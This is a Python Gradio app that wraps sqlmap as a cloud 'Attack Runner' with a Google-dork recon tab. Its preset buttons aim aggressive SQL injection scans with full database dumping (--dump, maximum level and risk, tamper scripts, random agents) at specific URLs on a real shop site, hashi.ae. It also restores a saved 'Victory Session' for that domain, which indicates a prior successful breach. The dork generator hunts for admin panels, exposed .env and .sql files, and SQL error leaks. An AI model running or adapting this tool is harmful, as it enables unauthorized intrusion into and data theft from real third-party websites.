| import gradio as gr |
| import subprocess |
| import os |
| import shutil |
| from pathlib import Path |
|
|
| |
| def restore_session(): |
| |
| session_source = "session.sqlite" |
| target_base = Path("/root/.local/share/sqlmap/output/hashi.ae") |
| |
| if os.path.exists(session_source): |
| try: |
| target_base.mkdir(parents=True, exist_ok=True) |
| shutil.copy(session_source, target_base / "session.sqlite") |
| |
| |
| target_www = Path("/root/.local/share/sqlmap/output/www.hashi.ae") |
| target_www.mkdir(parents=True, exist_ok=True) |
| shutil.copy(session_source, target_www / "session.sqlite") |
| |
| return f"β
Victory Session Injected into {target_base}" |
| except Exception as e: |
| return f"β οΈ Session restore warning: {str(e)}" |
| return "βΉοΈ No session file found in repository." |
|
|
| def run_sqlmap(url, threads, level, risk, tamper, techn, proxy, extra_args): |
| |
| session_status = restore_session() |
|
|
| if not url: |
| yield f"{session_status}\nβ Error: Target URL is required." |
| return |
|
|
| |
| cmd = ["python3", "/app/sqlmap-dev/sqlmap.py", "-u", url, "--batch"] |
| |
| |
| cmd += ["--threads", str(int(threads))] |
| cmd += ["--level", str(int(level))] |
| cmd += ["--risk", str(int(risk))] |
| |
| |
| if tamper: |
| cmd += ["--tamper", tamper] |
| if techn: |
| cmd += ["--technique", techn] |
| if proxy: |
| cmd += ["--proxy", proxy] |
| if extra_args: |
| cmd += extra_args.split() |
|
|
| yield f"{session_status}\nπ Launching SQLMAP Cloud Runner...\nπ°οΈ Command: {' '.join(cmd)}\n\n" |
| |
| try: |
| process = subprocess.Popen( |
| cmd, |
| stdout=subprocess.PIPE, |
| stderr=subprocess.STDOUT, |
| text=True, |
| bufsize=1, |
| universal_newlines=True |
| ) |
| |
| full_log = "" |
| for line in process.stdout: |
| full_log += line |
| yield full_log |
| |
| process.wait() |
| if process.returncode == 0: |
| yield full_log + "\nβ
Scan completed successfully." |
| else: |
| yield full_log + f"\nβ οΈ Scan stopped with return code {process.returncode}." |
| |
| except Exception as e: |
| yield f"β Fatal Error: {str(e)}" |
|
|
| |
| def set_hashi_victory(): |
| return ( |
| "https://hashi.ae/shop/page/4/?add-to-cart=638", |
| 10, 5, 3, |
| "", "U", "", |
| "--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast" |
| ) |
|
|
| def set_search_attack(): |
| return ( |
| "https://hashi.ae/?s=iphone", |
| 10, 5, 3, |
| "space2comment", "BEU", "", |
| "--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast" |
| ) |
|
|
| def set_mysql_attack(): |
| return ( |
| "https://hashi.ae/?s=iphone", |
| 10, 5, 3, |
| "space2comment", "BEU", "", |
| "--dbms=MySQL --dump --force-ssl --random-agent --no-cast" |
| ) |
|
|
| |
| def generate_dorks(domain, targeted_extensions, find_admin, find_files, find_errors): |
| dorks = [] |
| base = f"site:{domain}" if domain else "" |
| |
| if find_admin: |
| keywords = ["admin", "login", "dashboard", "portal", "cpanel", "wp-admin"] |
| for k in keywords: |
| dorks.append(f"Admin Search: {base} inurl:{k}") |
|
|
| if find_files: |
| exts = ["env", "log", "sql", "bak", "txt", "config"] |
| if targeted_extensions: |
| exts += targeted_extensions.split(",") |
| for ext in exts: |
| if ext.strip(): |
| dorks.append(f"File Exposure ({ext.strip()}): {base} ext:{ext.strip()}") |
| dorks.append(f"{base} intitle:\"index of\"") |
|
|
| if find_errors: |
| errors = ["SQL syntax", "warning: mysql_", "unclosed quotation mark", "syntax error"] |
| for err in errors: |
| dorks.append(f"Error Leak: {base} intext:\"{err}\"") |
|
|
| return "\n".join(dorks) |
|
|
| with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate")) as demo: |
| gr.Markdown("# π SLMP Cloud Runner v2.0 - Ultra Speed π©οΈ") |
| gr.Markdown("Deploy SQLMAP in the cloud for maximum bandwidth. Now includes Alpha Recon Studio.") |
| |
| with gr.Tabs(): |
| |
| with gr.TabItem("βοΈ Attack Runner"): |
| with gr.Row(): |
| with gr.Column(scale=2): |
| url_input = gr.Textbox(label="π― Target URL", placeholder="https://example.com/page.php?id=1") |
| |
| with gr.Tabs(): |
| with gr.TabItem("π Performance"): |
| with gr.Row(): |
| threads_input = gr.Slider(minimum=1, maximum=10, step=1, value=10, label="Threads") |
| level_input = gr.Slider(minimum=1, maximum=5, step=1, value=5, label="Level") |
| risk_input = gr.Slider(minimum=1, maximum=3, step=1, value=3, label="Risk") |
| |
| with gr.TabItem("π‘οΈ Advanced"): |
| tamper_input = gr.Textbox(label="π§ͺ Tampers", placeholder="space2comment,randomcase") |
| techn_input = gr.Textbox(label="π‘ Technique", placeholder="U (UNION), B (Blind), etc.") |
| proxy_input = gr.Textbox(label="π Proxy (Optional)", placeholder="http://127.0.0.1:8080") |
| extra_input = gr.Textbox(label="βοΈ Extra Arguments", placeholder="--dbms=Oracle --dump --batch") |
|
|
| with gr.Row(): |
| btn_run = gr.Button("π₯ START SCAN", variant="primary") |
| with gr.Row(): |
| btn_hashi = gr.Button("π° Hashi Victory", variant="secondary") |
| btn_search = gr.Button("π Search (Oracle)", variant="stop") |
| btn_mysql = gr.Button("π¬ Search (MySQL - Plan D)", variant="secondary") |
| btn_stop = gr.Button("π STOP", variant="stop") |
|
|
| with gr.Column(scale=3): |
| output_log = gr.Code(label="π LIVE CLOUD LOGS", language="markdown", interactive=False, lines=30) |
|
|
| |
| with gr.TabItem("π¦
Alpha Recon Studio"): |
| with gr.Row(): |
| with gr.Column(): |
| domain_input = gr.Textbox(label="Target Domain", placeholder="example.com") |
| ext_input = gr.Textbox(label="Custom Extensions", placeholder="jsp, php, asp") |
| |
| with gr.Group(): |
| check_admin = gr.Checkbox(label="Find Admin Panels", value=True) |
| check_files = gr.Checkbox(label="Find Sensitive Files", value=True) |
| check_errors = gr.Checkbox(label="Find SQL Errors", value=True) |
| |
| btn_gen = gr.Button("π Generate Recon Dorks", variant="primary") |
| |
| with gr.Column(): |
| dork_output = gr.Code(label="Generated Dorks", language="text", lines=20) |
|
|
| |
| btn_run.click(run_sqlmap,inputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input], outputs=output_log, queue=True) |
| btn_hashi.click(set_hashi_victory, outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input]) |
| btn_search.click(set_search_attack, outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input]) |
| btn_mysql.click(set_mysql_attack, outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input]) |
|
|
| |
| btn_gen.click(generate_dorks, inputs=[domain_input, ext_input, check_admin, check_files, check_errors], outputs=dork_output) |
|
|
| if __name__ == "__main__": |
| print("β¨ SLMP Panel Live.") |
| demo.queue().launch(server_name="0.0.0.0", server_port=7860) |
|
|
